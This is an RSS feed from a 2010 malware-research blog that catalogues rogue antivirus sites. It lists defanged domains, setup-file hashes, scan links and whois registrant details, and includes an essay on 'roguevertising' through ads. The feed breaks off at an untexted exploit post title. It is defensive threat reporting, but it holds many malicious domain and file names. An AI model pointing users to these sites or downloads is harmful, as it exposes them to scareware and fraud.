<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Malware Database</title>
	<atom:link href="http://malwaredatabase.net/blog/index.php/feed/" rel="self" type="application/rss+xml" />
	<link>http://malwaredatabase.net/blog</link>
	<description>Malware Database is a group of security professionals and a few hobbyists who each contribute to a private distributed database of malicious binaries while raising awareness on current malware trends through our website.</description>
	<lastBuildDate>Fri, 16 Jul 2010 07:11:02 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=abc</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>new rogue domain: antivirmore.com</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/07/14/new-rogue-domain-antivirmore-com/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/07/14/new-rogue-domain-antivirmore-com/#comments</comments>
		<pubDate>Wed, 14 Jul 2010 19:12:02 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2221</guid>
		<description><![CDATA[Whois record for antivirmore.com
Registrant Contact:
Name: Youriy Lens
Address: 15 avenue 45-13
City: New York,NY
Country: United States
hxxp://antivirmore.com
Result: 1/17 (6 %)
Domain Hash: 361a40e6b3b2a635b6924e5c5aaceb6d
URLVoid
Note: this page does not trigger a &#8220;scan&#8221; of your computer.
Some related domains:

hxxp://Antispy-defender.com
hxxp://Antispywork.com
hxxp://Antivir-product.com
hxxp://Antivirglass.com
hxxp://Antivirprime.com
hxxp://Antivirstat.com
hxxp://Av-look.com

Screenshot example:

AV Security Suite home page
]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/antivirmore.com">Whois record for antivirmore.com</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Youriy Lens<br />
Address: 15 avenue 45-13<br />
City: New York,NY<br />
Country: United States</p>
<p><strong>hxxp://antivirmore.com</strong><br />
Result: <strong><span style="color: red">1</span>/17</strong> (6 %)<br />
Domain Hash: 361a40e6b3b2a635b6924e5c5aaceb6d<br />
<a href="http://www.urlvoid.com/scan/antivirmore.com">URLVoid</a><br />
<em>Note: this page does not trigger a &#8220;scan&#8221; of your computer.</em></p>
<p>Some related domains:<br />
<strong><br />
hxxp://Antispy-defender.com<br />
hxxp://Antispywork.com<br />
hxxp://Antivir-product.com<br />
hxxp://Antivirglass.com<br />
hxxp://Antivirprime.com<br />
hxxp://Antivirstat.com<br />
hxxp://Av-look.com<br />
</strong></p>
<p>Screenshot example:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/07/Naamloos-e1279134190999.jpg" alt="AV Security Suite home page" /><br />
<em>AV Security Suite home page</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/07/14/new-rogue-domain-antivirmore-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>new rogue domain: oksave9.co.cc</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/07/06/new-rogue-domain-oksave9-co-cc/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/07/06/new-rogue-domain-oksave9-co-cc/#comments</comments>
		<pubDate>Tue, 06 Jul 2010 21:10:39 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2211</guid>
		<description><![CDATA[Whois record for oksave9.co.cc
Registrant Contact:
Name: Jong Sung, Kim
Address: 864-2, Janghangdong, Ilsan
City: Goyang, Gyeonggi-do
Country: South Korea
packupdate107_195.exe
Result: 7/41 (17.07%)
MD5: 08a2ad37c6920b640615d7a1d6c3bbec
VirusTotal
Anubis Report
ThreatExpert Report
Rogueware Page: hxxp://www1.oksave9.co.cc
Result: 2/17 (12 %)
Domain Hash: 9b83d635ed7bf5be568e9cbae3b97935
URLVoid
Note: this rogueware page triggers a “scan” of your computer if redirected by a search engine.
This rogue is called Security Master AV.
Screenshot examples:

Security Master AV fake notification

Security Master AV [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/oksave9.co.cc">Whois record for oksave9.co.cc</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Jong Sung, Kim<br />
Address: 864-2, Janghangdong, Ilsan<br />
City: Goyang, Gyeonggi-do<br />
Country: South Korea</p>
<p><strong>packupdate107_195.exe</strong><br />
Result: <strong><span style="color: red">7</span>/41</strong> (17.07%)<br />
MD5: 08a2ad37c6920b640615d7a1d6c3bbec<br />
<a href="http://www.virustotal.com/analisis/04ac75c6e410bd18b9af5514c7a80c529bf0d4031592a8307b5716747b78a51c-1278441535">VirusTotal</a><br />
<a href="https://anubis.iseclab.org/?action=result&amp;task_id=1b88df6b908cc2d745d01a927ef59754b&amp;format=html">Anubis Report</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=08a2ad37c6920b640615d7a1d6c3bbec">ThreatExpert Report</a></p>
<p>Rogueware Page: hxxp://www1.oksave9.co.cc<br />
Result: <strong><span style="color: red">2</span>/17</strong> (12 %)<br />
Domain Hash: 9b83d635ed7bf5be568e9cbae3b97935<br />
<a href="http://www.urlvoid.com/scan/oksave9.co.cc">URLVoid</a><br />
<em>Note: this rogueware page triggers a “scan” of your computer if redirected by a search engine.</em></p>
<p>This rogue is called Security Master AV.</p>
<p>Screenshot examples:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/07/ss1-e1278450339893.jpg" alt="Security Master AV fake notification" /><br />
<em>Security Master AV fake notification</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/07/ss4-e1278450342393.jpg" alt="Security Master AV fake scan page" /><br />
<em>Security Master AV fake scan page</em></p>
<p>When executing the file ( <strong>packupdate107_195.exe</strong> ):<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/07/getimage.aspx_-e1278450548680.gif" alt="Security Master AV Setup" /><br />
<em>Security Master AV Setup</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/07/06/new-rogue-domain-oksave9-co-cc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>new rogue domain: antivirus-elite.com</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/06/22/new-rogue-domain-antivirus-elite-com/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/06/22/new-rogue-domain-antivirus-elite-com/#comments</comments>
		<pubDate>Tue, 22 Jun 2010 21:08:13 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2204</guid>
		<description><![CDATA[Whois record for antivirus-elite.com
Registrant Contact:
Name: Domains by Proxy, Inc.
Address: 15111 N. Hayden Rd., Ste 160, PMB 353
City: Scottsdale, Arizona 85260
Country: United States
setup.exe
Result: 16/41 (39.02%)
MD5: 27b002ee170c751d14e030dacbb52b9f
VirusTotal
Anubis Report
ThreatExpert Report
Rogueware Page: hxxp://www.antivirus-elite.com
Result: 6/19 (32 %)
Domain Hash	: 7cd43e9333370d93ed8df0cc6a55bf7f
URLVoid
Note: this rogueware page does not trigger a “scan” of your computer.
This rogue is called Anti-Virus Elite v5.0.
Screenshot examples:

Anti-Virus Elite Website
When executing [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/antivirus-elite.com">Whois record for antivirus-elite.com</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Domains by Proxy, Inc.<br />
Address: 15111 N. Hayden Rd., Ste 160, PMB 353<br />
City: Scottsdale, Arizona 85260<br />
Country: United States</p>
<p><strong>setup.exe</strong><br />
Result: <strong><span style="color: red">16</span>/41</strong> (39.02%)<br />
MD5: 27b002ee170c751d14e030dacbb52b9f<br />
<a href="http://www.virustotal.com/analisis/b65aee3f980565cb08ccdb2235618d235b95860b67f2acee971d466ffd567dce-1276411643">VirusTotal</a><br />
<a href="https://anubis.iseclab.org/?action=result&amp;task_id=1684f59adb5881444e9687051e7eb0838&amp;format=html">Anubis Report</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=27b002ee170c751d14e030dacbb52b9f">ThreatExpert Report</a></p>
<p>Rogueware Page: hxxp://www.antivirus-elite.com<br />
Result: <strong><span style="color: red">6</span>/19</strong> (32 %)<br />
Domain Hash	: 7cd43e9333370d93ed8df0cc6a55bf7f<br />
<a href="http://www.urlvoid.com/scan/antivirus-elite.com">URLVoid</a><br />
<em>Note: this rogueware page does not trigger a “scan” of your computer.</em></p>
<p>This rogue is called Anti-Virus Elite v5.0.</p>
<p>Screenshot examples:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/avtrjelite-e1277240529638.jpg" alt="Anti-Virus Elite Website" /><br />
<em>Anti-Virus Elite Website</em></p>
<p>When executing the file ( <strong>setup.exe</strong> ):<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/avelite-e1277240536759.jpg" alt="Anti-Virus Elite Warning Message" /><br />
<em>Anti-Virus Elite Warning Message</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/av-e1277240539961.jpg" alt="Anti-Virus Elite Interface" /><br />
<em>Anti-Virus Elite Interface</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/06/22/new-rogue-domain-antivirus-elite-com/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Introducing: Roguevertising</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/06/14/introducing-roguevertising-2/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/06/14/introducing-roguevertising-2/#comments</comments>
		<pubDate>Mon, 14 Jun 2010 20:00:28 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Blackhat SEO]]></category>
		<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Malware Distribution]]></category>
		<category><![CDATA[Rogue Security Software]]></category>
		<category><![CDATA[Rogue Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2149</guid>
		<description><![CDATA[Introducing: Roguevertising 
A new term in the rogue industry – written by Bart Parys

Today I will be talking about a new trend that spreads itself quite quickly throughout the internet.
In this document I will try to explain what it is all about and provide additional information like screenshots and measures that can be taken to [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size: medium"><strong>Introducing: Roguevertising </strong></span></p>
<p>A new term in the rogue industry – <em>written by <strong>Bart Parys</strong></em></p>
<p><BR /></p>
<p>Today I will be talking about a new trend that spreads itself quite quickly throughout the internet.<br />
In this document I will try to explain what it is all about and provide additional information like screenshots and measures that can be taken to tackle these threats.</p>
<p>It all started when I found a new rogue domain:<br />
<strong>hxxp://antispyware.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/antispyware-e1276116330192.jpg" alt="antispyware.com" /><br />
<em>Antispyware2010 website</em></p>
<p>The following domains are associated with Antispyware.com:<br />
<strong> hxxp://antispyware2009.com<br />
hxxp://Errorsmart.com<br />
hxxp://Registryclear.com<br />
hxxp://Remover.org</strong></p>
<p>They all introduce the same ‘product’ – to perform a scan for malware on your computer. You can even request Live Technical Support.<br />
(No, not really, it will just refer you to the download page)</p>
<p>When you download their product, you can find the following setup file in your chosen download folder:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/setupxv.jpg" alt="setupxv" /></p>
<p><strong><em>setupxv.exe</em></strong></p>
<p>Pending on the website you landed on, you can also download another file called <strong>setup.exe</strong></p>
<p>The file <strong>setupxv.exe </strong>has currently a 53.66% detection ratio on VirusTotal. The classification most used included the name <strong>Fakealert:<br />
</strong><a href="http://www.virustotal.com/analisis/633e4d8ee17cd2def4e1ed23fa48fc0546ca6eeb4534c9d8311873a7ef9a72c8-1275164029">VirusTotal Result </a><br />
It is also possible you download a file with the same name (<strong>setupxv.exe</strong>) but with slightly changed binaries. You can find an example of this on VirusTotal:<br />
<a href="http://www.virustotal.com/nl/analisis/492defd997778fab1f9c6ae5049b7a722cab5488992cf9e20bee2ff975eb32d4-1275163990">VirusTotal Result</a></p>
<p>For more information about this rogue program and the others described down below, I refer to the end of this document, where you can find some screenshots of my findings.</p>
<p><BR /></p>
<p>Then, after performing some Google searches on fake testimonials and information taken from their website , I landed on the following rogue domain:</p>
<p><strong>hxxp://againstadware.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/againstadware.jpg" alt="againstadware.com" /><br />
<em>AgainstAdware website</em></p>
<p>Unfortunately, you cannot download their product anymore, as the setup file has been removed.</p>
<p>The following domains are associated with Againstadware.com:</p>
<p><strong>http://Fileboxx.com</strong></p>
<p><strong>http://Incredible-mail-download.com </strong></p>
<p><strong>http://Secureoneantivirus.com </strong></p>
<p><strong>http://Wincleanerpro.com</strong></p>
<p><BR /></p>
<p>Now, why am I introducing the term <strong><em>roguevertising</em></strong> ?</p>
<p>You might have heard about malvertising. Malvertising (short for <em><strong>Malicious Advertising</strong></em>)  is a term used for malicious advertisements that are clicked on, and can deliver a drive-by-download or suggesting to install a certain program to clean and scan your computer.</p>
<p>These days I have found a lot of websites using malvertising for rogue security software. That is how the term roguevertising was born.</p>
<p>A few examples of these websites:</p>
<p>hxxp://www.hopelinenc.org/forum/anti-spyware</p>
<p>hxxp://www.thedietsolutionprogram.ws/weblog/anti-spyware</p>
<p>hxxp://www.thedietsolutionprogram.ws/rating/anti-spyware</p>
<p>hxxp://www.perfectoptimizer5.com/?hop=aseafood</p>
<p><strong>hxxp://www.bestspywareprogram.net</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/antipsyware2.jpg" alt="antispyware.com roguevertising" /><br />
<em>Along with legit Antispyware applications, you can find “Antispyware” between the list with … an advertisement leading to the download link of the rogue. (Done through an advertising mirror)</em></p>
<p>hxxp://threats.browsetag.com/antispyware<br />
hxxp://www.plrarticlesoftware.biz/forum/anti-spyware<br />
hxxp://www.earth4energyoffical.com/weblog/anti-spyware<br />
hxxp://www.earth4energyoffical.com/article/adware-alert<br />
hxxp://www.earth4energyoffical.com/article/privacy-control<br />
hxxp://www.theaffiliatecode.ws/weblog/anti-spyware<br />
hxxp://www.legitonlinejobshome.com/tags/anti-spyware</p>
<p>Additionally, I stumbled upon the following rogue domain:<br />
<strong>hxxp://spywareremover.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/sremoversite.jpg" alt="spywareremover.com website" /><br />
<em>SpywareRemover website</em></p>
<p>When you download their product, you can find the following setup file in your chosen download folder:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/sricon.jpg" alt="SpywareRemover icon" /><br />
<strong>Setupxv.exe</strong></p>
<p>That’s right. Setupxv all over again, but with a different icon and again changed binaries.</p>
<p>The file setupxv.exe has currently a 39.02% detection ratio on VirusTotal. The classification most used included the name <strong>AdSpy</strong>:<br />
<a href="http://www.virustotal.com/analisis/ce3ac22233c43699b38df1b646ae8ebcadaf91b7967982b892d6046894244e43-1275329078">VirusTotal Result</a></p>
<p><BR /></p>
<p><em>Do you surf the internet ? Does your PC run slow ? Do you get bombarded with annoying pop-up ads ?</em><br />
Then you are most likely to land on the following page:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/adalert-e1276443305665.jpg" alt="Adware Alert homepage" /><br />
<em>AdwareAlert website</em></p>
<p>Yet again, setupxv is presented to you with a nice new icon:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/setupxv3.jpg" alt="AdwareAlert icon" /></p>
<p>Current VirusTotal detection rate is 48.78% . The file was again changed to avoid detections by Antivirus software. (also introduces another GUI as noted at the end of this document)<br />
<a href="http://www.virustotal.com/analisis/e79284c09981b09f2371d7c7b9e6109b3e6f20e8813ed794b0a8f3e306896315-1275331869">VirusTotal Result</a></p>
<p>The <strong>setupxv rogueware campaign</strong> is on a roll, down below some associated domains with AdwareAlert.com:</p>
<p>hxxp://Cbadvance.com<br />
hxxp://Errorkiller.com<br />
hxxp://Evidenceeraser.com<br />
hxxp://Malwarebot.com<br />
hxxp://Malwareremovalbot.com<br />
hxxp://Registrybot.com<br />
hxxp://Registrysmart.com<br />
hxxp://Regrecall.com<br />
hxxp://Regsweep.com<br />
hxxp://Spywarebot.com<br />
hxxp://Spywarestop.com</p>
<p><BR /></p>
<p>Next rogueware domain on our list is:<br />
<strong>hxxp://www.antispywarebotpro.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/asbot-e1276444037836.jpg" alt="AntiSpywarebot homepage" /><br />
<em>AntiSpywareBot website</em></p>
<p>As always your download is free as well as the malicious payload:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/setupxv2.jpg" alt="asbot icon" /><br />
<strong>Setupxv.exe</strong></p>
<p>Current VirusTotal detection rate is 48.78% .<br />
<a href="http://www.virustotal.com/analisis/134835213f63be16bf58619b1402878a4b0ac06b7c87c3317fd5263582f24306-1275329071">VirusTotal Result</a></p>
<p>Related domains in this case are:</p>
<p>hxxp://mail.remover.org<br />
hxxp://www.privacycontrolpro.com<br />
hxxp://errorsweeperpro.com<br />
hxxp://Regcleanlite.com<br />
hxxp://www.browsetag.com/spyware/virus/threats<br />
hxxp://support.browsetag.com/certified/antispyware<br />
hxxp://www.spywarenuker-gary.com/blog/anti-spyware<br />
hxxp://www.spywarenuker-gary.com/blog/adware-alert</p>
<p>As you might have noticed, <strong>roguevertising</strong> is appearing on these last pages. <em>Spywarenuker Gary</em> needs to find another name, as his directory is filled with malicious advertisements and bloatware:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/spygary-e1276444350562.jpg" alt="spywarenuker gary directory" /><br />
<em>Part of a roguevertising directory</em></p>
<p><BR /></p>
<p>I have also gathered the following URLs which are also related to the <strong>setupxv rogueware campain</strong>:</p>
<p>hxxp://adwarealert.com<br />
hxxp://Cbadvance.com<br />
hxxp://Errorkiller.com<br />
hxxp://Evidenceeraser.com<br />
hxxp://Malwarebot.com<br />
hxxp://Malwareremovalbot.com<br />
hxxp://Registrybot.com<br />
hxxp://Registrysmart.com<br />
hxxp://Regrecall.com<br />
hxxp://Regsweep.com<br />
hxxp://Spywarebot.com<br />
hxxp://Spywareremover.com<br />
hxxp://Spywarestop.com</p>
<p>One of the rogues download above, again setupxv:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/setupxv4.jpg" alt="Setupxv.exe" /><br />
<strong>Setupxv.exe</strong></p>
<p>This new version of setupxv only has a 4.88% detection ratio on VirusTotal:<br />
<a href="http://www.virustotal.com/analisis/b28da9e00b47ed47a40f8c23ffabad68792e7c1eaa7a439b76da84d6e1886b14-1275421542">VirusTotal Result</a></p>
<p>&#8230; and delivers you the program <strong>RegClean</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/regclean-e1276444571163.jpg" alt="RegClean Setup Wizard" /><br />
<em>RegClean Setup Wizard</em></p>
<p><BR /></p>
<p>The following rogue that you might remember is <strong>Spyware Cease</strong>:</p>
<p><strong>hxxp://www.spywarecease.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/spywarecease_site-e1276452864745.jpg" alt="SpywareCease website" /><br />
<em>SpywareCease website</em></p>
<p>SpywareCease comes in the following setup file:<br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/spcease.jpg" alt="spywarecease icon" /></p>
<p>It has currently a 12.20% ratio on VirusTotal:<br />
<a href="http://www.virustotal.com/analisis/bbb371a070a5fdfec9e41b4bc1ac82035d66ea8bc52e5b265c24bf33b7c3bec0-1275591237">VirusTotal Result</a></p>
<p>Associated domains and roguevertising links for Spywarecease.com:</p>
<p>hxxp://www.spycease.com<br />
hxxp://www.micronichefinderhome.com/blog/spyware-cease<br />
hxxp://entrepreneur.useoursite.com/go.php?p=SSPYKILLER<br />
hxxp://offto.net/SpywareCease_4ee8<br />
hxxp://viral-link-exchange.info/clickbank-supercenter/html/spyware-cease-1-converting-anti-spyware-software.htm<br />
hxxp://www.cheapsale.org/html/spyware-cease-1-converting-anti-spyware-software.htm<br />
hxxp://www.easyfixcomputersolutions.com/home.php<br />
hxxp://www.easydigitalsales.com/33027/Spyware-Cease&#8212;1-Converting-Anti-Spyware-Software.html</p>
<p><BR /></p>
<p>We are moving on to the last roguevertising campaign, brought to you by <strong>007 Anti-Spyware</strong>.<br />
I stumbled upon this one while investigating the SpywareCease roguevertising campaign.<br />
<strong>hxxp://www.007antispyware.com</strong><br />
Unfortunately (or luckily) this site was down at the time of writing, but I found a roguevertising domain for this one:<br />
<strong>hxxp://007antyspyware.blogspot.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/007blog-e1276453581157.jpg" alt="007 Anti-Spyware website (blog)" /><br />
<em>007 Anti-Spyware website (blog)</em></p>
<p>The blog provides an ad-provided mirror for the setup file <strong>007antipsyware.exe</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/007icon1.jpg" alt="007antipsyware.exe" /><br />
<strong>007antipsyware.exe</strong></p>
<p>The file has currently very low detection ratios on Virustotal. Only 4.88% of the scanners detect it,<br />
namely as <strong>Adware.SpywareCease</strong>. Rings a bell somewhere…<br />
<a href="http://www.virustotal.com/analisis/00af78f64c9d4320a0363dc00605c8af0a7ad6727e1510b2cc60dc29524da202-1275334789">VirusTotal Result</a></p>
<p>But the fun is not over yet. When visiting this <em>roguevertiser</em>’s Twitter page, you can install the <strong>Googod toolbar</strong>. Now we can add spyware on the list, since the Googod toolbar is copyrighted under<br />
Conduit Ltd., which is renowned for its spyware activities. This toolbar is available for Internet Explorer, Mozilla Firefox and Safari.</p>
<p><strong>hxxp://www.googod.ourtoolbar.com</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/googodtoolbar-e1276454226460.jpg" alt="Googod toolbar website" /><br />
<em>Googod toolbar website</em></p>
<p>2.44% on VirusTotal<br />
<a href="http://www.virustotal.com/analisis/8d74a61b580595247762b64289d680e71dc63684660ea45286655a2b1b0fcb75-1275656281">VirusTotal Result</a></p>
<p><BR /></p>
<p><strong><span style="font-size: medium">Conclusion</span></strong></p>
<p>Although malvertising is not a new concept, <em>roguevertising</em> however is.<br />
I hope that throughout this document it became a bit clearer what it is all about and how only one rogueware campaign is and will be able to infect a lot of users.<br />
No, the rogueware will not clean nor speed up your computer.</p>
<p>Pushing rogueware downloads through advertisements on weblogs, bloatware websites or even on Google, will be a phenomenon we have to deal with. In this case the <em>setupxv rogueware campaign</em> was able to spread itself through different domains, which can attract users to actually download and install the software.</p>
<p>But there might be hope.In my opinion can websites like Antispyware.com be prevented by ever seeing the light: <em>register domains that can be used for roguevertising</em>. In this case, the setupxv creators would not have been able to register this domain, and users would get a message stating the website is under construction, for example or it is registered for the single purpose of stopping websites like this.<br />
Another option would be for the domain linking to an AntiVirus vendor, as described below.<br />
After all, the site <em>Antispyware.com website</em> sounds legit, and when you visit the site, the user will not notice anything suspicious. For example Antivirus.com is registered to TrendMicro.<br />
When you look up Antispyware.com however, you get a 32 % dangerous rating on URLVoid:<br />
<a href="http://www.urlvoid.com/scan/antispyware.com">URLVoid Result</a></p>
<p>Tools like <em>Web Of Trust</em> (WOT) can prevent you from landing on sites like Antispyware.com.<br />
Other manners to prevent this can either be hostfile-based or user-based.<br />
Examples can be <em>MVPS Hosts</em> or <em>Sandboxie</em>. Common sense however will always be the most important factor, just remember the following rule: <strong>if it looks like a rogue, it probably is !</strong><br />
This does of course not imply that every suspicious looking program is malicious, rather perform some checks with your favorite search engine or use <em>URLVoid</em> and <em>VirusTotal</em> as a reference.</p>
<p>Further rogueware screenshots are provided down below. Thank you for reading.</p>
<p><BR /></p>
<p><strong>007 Antispyware</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/007-e1276541636986.jpg" alt="Setup screen" /><br />
<em>Setup screen</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/007icon.jpg" alt="Shortcut icon" /><br />
<em>Shortcut icon</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/007gui-e1276543083276.jpg" alt="Interface" /><br />
<em>Interface</em></p>
<p><strong>Adware Alert</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/aasetup-e1276544080158.jpg" alt="Setup screen" /><br />
<em>Setup screen</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/adwarealerticon.jpg" alt="Shortcut icon" /><br />
<em>Shortcut icon</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/adwarealertgui-e1276544087837.jpg" alt="Interface" /><br />
<em>Interface</em></p>
<p><strong>Antispyware 2008</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/antispyware2008-e1276544433785.jpg" alt="Setup screen" /><br />
<em>Setup screen</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/antipsyware2008.jpg" alt="Shortcut icon" /><br />
<em>Shortcut icon</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/aspgui-e1276544435194.jpg" alt="Interface" /><br />
<em>Interface</em></p>
<p><strong><br />
</strong></p>
<p><strong>007 Antispyware</strong><br />
<img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/spycease-e1276544543724.jpg" alt="Setup screen" /><br />
<em>Setup screen</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/scicon-e1276544552757.jpg" alt="Shortcut icon" /><br />
<em>Shortcut icon</em></p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/scgui-e1276544547149.jpg" alt="Interface" /><br />
<em>Interface</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/06/14/introducing-roguevertising-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>new rogue domain: fastcleancure47pd.co.cc</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/06/13/new-rogue-domain-fastcleancure47pd-co-cc/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/06/13/new-rogue-domain-fastcleancure47pd-co-cc/#comments</comments>
		<pubDate>Sun, 13 Jun 2010 14:01:36 +0000</pubDate>
		<dc:creator>bartblaze</dc:creator>
				<category><![CDATA[Database Update]]></category>
		<category><![CDATA[Low Detection]]></category>
		<category><![CDATA[Rogue Security Software]]></category>

		<guid isPermaLink="false">http://malwaredatabase.net/blog/?p=2163</guid>
		<description><![CDATA[Whois record for fastcleancure47pd.co.cc
Registrant Contact:
Name: Jong Sung, Kim
Address: 864-2
City:janghangdong, Ilsan, Goyang, Gyeounggi
Country: South-Korea
setup.exe
Result: 4/41 (20.00%)
MD5: d0167b975dc0734cb2bac4b4bad2eb86
VirusTotal
Anubis Report
ThreatExpert Report
Rogueware Page: hxxp://www2.fastcleancure47pd.co.cc
This rogue is called Security Essentials 2010.
Screenshot example:

Fake Scanner Page
]]></description>
			<content:encoded><![CDATA[<p><a href="http://whois.domaintools.com/fastcleancure47pd.co.cc">Whois record for fastcleancure47pd.co.cc</a></p>
<p><strong>Registrant Contact:</strong><br />
Name: Jong Sung, Kim<br />
Address: 864-2<br />
City:janghangdong, Ilsan, Goyang, Gyeounggi<br />
Country: South-Korea</p>
<p><strong>setup.exe</strong><br />
Result: <strong><span style="color: red">4</span>/41</strong> (20.00%)<br />
MD5: d0167b975dc0734cb2bac4b4bad2eb86<br />
<a href="http://www.virustotal.com/analisis/12ae536af52f33ad8e2cdc3ffe16e2c26f21e0efca231d32b46715cde21b375d-1276398184">VirusTotal</a><br />
<a href="https://anubis.iseclab.org/?action=result&amp;task_id=19163dc01b7b65d6471e7659c40369299&amp;format=html">Anubis Report</a><br />
<a href="http://www.threatexpert.com/report.aspx?md5=d0167b975dc0734cb2bac4b4bad2eb86">ThreatExpert Report</a><br />
Rogueware Page: hxxp://www2.fastcleancure47pd.co.cc</p>
<p>This rogue is called Security Essentials 2010.</p>
<p>Screenshot example:</p>
<p><img src="http://malwaredatabase.net/blog/wp-content/uploads/2010/06/naamloos-e1276437592629.jpg" alt="Fake Scanner Page" /><br />
<em>Fake Scanner Page</em></p>
]]></content:encoded>
			<wfw:commentRss>http://malwaredatabase.net/blog/index.php/2010/06/13/new-rogue-domain-fastcleancure47pd-co-cc/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Robint.us SQLi Utilizing CVE-2010-1297 Exploit</title>
		<link>http://malwaredatabase.net/blog/index.php/2010/06/11/robint-us-sqli-utilizing-cve-2010-1297-exploit/</link>
		<comments>http://malwaredatabase.net/blog/index.php/2010/06/11/robint-us-sqli-utilizing-cve-2010-1297-exploit/#comments</comments>
		<pubDate>Fri, 11 Jun 2010 22:23:15 +0000</pubDate>
		<dc:creator>lithium</dc:creator>
				<category><![CDATA[Exploit]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[IFRAME]]></category>
